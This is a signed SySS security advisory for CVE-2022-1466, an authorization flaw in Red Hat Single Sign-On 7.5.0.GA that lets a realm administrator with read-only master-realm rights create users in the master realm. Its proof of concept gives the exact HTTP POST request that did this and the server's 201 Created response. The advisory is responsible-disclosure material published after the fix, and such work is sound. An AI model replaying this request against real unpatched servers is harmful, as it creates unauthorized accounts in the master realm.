-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2021-076 Product: Red Hat Single Sign-On Manufacturer: Red Hat, Inc. Affected Version(s): 7.5.0.GA Tested Version(s): 7.5.0.GA Vulnerability Type: Incorrect Authorization (CWE-863) Risk Level: Medium Solution Status: Fixed Manufacturer Notification: 2021-12-08 Solution Date: 2022-02-07 Public Disclosure: 2022-02-10 CVE Reference: CVE-2022-1466 Author of Advisory: Christian Dölling, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: Red Hat Single Sign-On is a single sign-on solution. The manufacturer describes the product as follows (see [1]): "Red Hat Single Sign-On (RH-SSO) is based on the Keycloak project and enables you to secure your web applications by providing Web single sign-on (SSO) capabilities based on popular standards such as SAML 2.0, OpenID Connect and OAuth 2.0. The RH-SSO server can act as a SAML or OpenID Connect-based Identity Provider, mediating with your enterprise user directory or 3rd-party SSO provider for identity information and your applications via standards-based tokens." Due to improper authorization, Red Hat Single Sign-On is vulnerable to users performing actions they should not be allowed to perform. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: It was possible to add users to the master realm even though no respective permission was granted. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): The author was provided with a user account with administrative privileges in all realms but the master realm. Within the master realm, read-only permissions were granted. This was confirmed by the owner of the Red Hat Single Sign-On instance and was reflected by the fact that an "add user" button was available in all realms but the master realm. Nevertheless, when the author sent the following request to the server, the server responded as shown below. Request: POST /auth/admin/realms/master/users HTTP/1.1 Host: login-stage.customer.com Cookie: INGRESS_SESSION_ID=XXX User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json;charset=utf-8 Authorization: Bearer [...] Content-Length: 146 Origin: https://login-stage.customer.com Te: trailers Connection: close {"enabled":true,"attributes":{},"groups":[],"emailVerified":true,"username":"SySS PoC","email":"poc@cd.sy.gs","firstName":"SySS","lastName":"PoC"} Response: HTTP/1.1 201 Created Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://login-stage.customer.com Access-Control-Expose-Headers: Location Date: Tue, 07 Dec 2021 15:44:58 GMT Location: https://login-stage.customer.com/auth/admin/realms/master/users/f5436560-00d0-42db-8486-81db59e61612 Referrer-Policy: no-referrer Strict-Transport-Security: max-age=31536000; includeSubDomains X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Content-Length: 0 Connection: Close Afterwards, the author was able to confirm the successful creation of the user in the web front end. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Check authorization on server before adding a new user. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2021-12-07: Vulnerability discovered 2021-12-08: Vulnerability reported to manufacturer 2022-02-07: Patch released by manufacturer 2022-02-10: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for Red Hat Single Sign-On https://access.redhat.com/products/red-hat-single-sign-on [2] SySS Security Advisory SYSS-2021-076 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-076.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy [4] CVE-2022-1466 on Red Hat Customer Portal https://access.redhat.com/security/cve/cve-2022-1466 [5] CVE-2022-1466 on National Vulnerability Database (NVD) https://nvd.nist.gov/vuln/detail/CVE-2022-1466 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Christian Dölling of SySS GmbH. E-Mail: christian.doelling@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Christian_D%C3%B6lling.asc Key Fingerprint: 5478 245B 07F7 11D8 89EB 4FF9 22CC 67D4 1729 49A2 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEVHgkWwf3EdiJ60/5Isxn1BcpSaIFAmJyi4kACgkQIsxn1Bcp SaJWKxAAolXS6c7cjC/jLGnagkNBVtVYb8cIidLeKS/GsGMC0llDIHekcVOkVNVU 529vzKoaSvaHCvdfWJdvxn9Adv7djnNL9i2hQYNEWot2hvf+XBDECkGUnas8SLQ7 gfte3yLZJJGZHgvIwRxRHqgOdrKl0eCKJ1aNsmcF4LxQ5kKh9bS4QudsNKSH7JbG I8Sj1rtPJviwMZFWPLcgu2EcR3Rvak/78LcdQtfQzt4HKMOnKSgnMn55DRX+mRcv tWPiTBL/dKuTEUKeUSY1cqbATKa5MqO6PuXgvic8h9HuXRnEf6QuUnU2qMeMs0qn n9xrJSK256vMT84slfch2m5Q0jyMSu7aI7sl5EaHEA+9j2G/Sv/yI9b+Qm5iFXZS RawdZ/XB53Wt/dMfyax1U5WN7mryRsHHhbCjerq6ZYNpx7Q/iCqoL6vNEMizBlW2 TG0rln5qioGTvXFcL2w7cQRfc9ZXg8DefA6gUU+f6atHWQH5aWYKq8ol0QwvlvmC jjQ/tayRd+DG/fccTpqGSZ8R3oYzt+VX4NrXsZ5osxq3KR9sqo1DH8KLbm3EG1ee SuN+4iGSARV8ADQR/Kw6jPKM8YZ/TJ4JxOspaU0qV1oVcCJf0F2yteTUulVvG5IY 98hn0UjIpG8vhNf2j3m3d8w7SYGhlBlWzCvkRXRx5xMRSGPNNEE= =cQvz -----END PGP SIGNATURE-----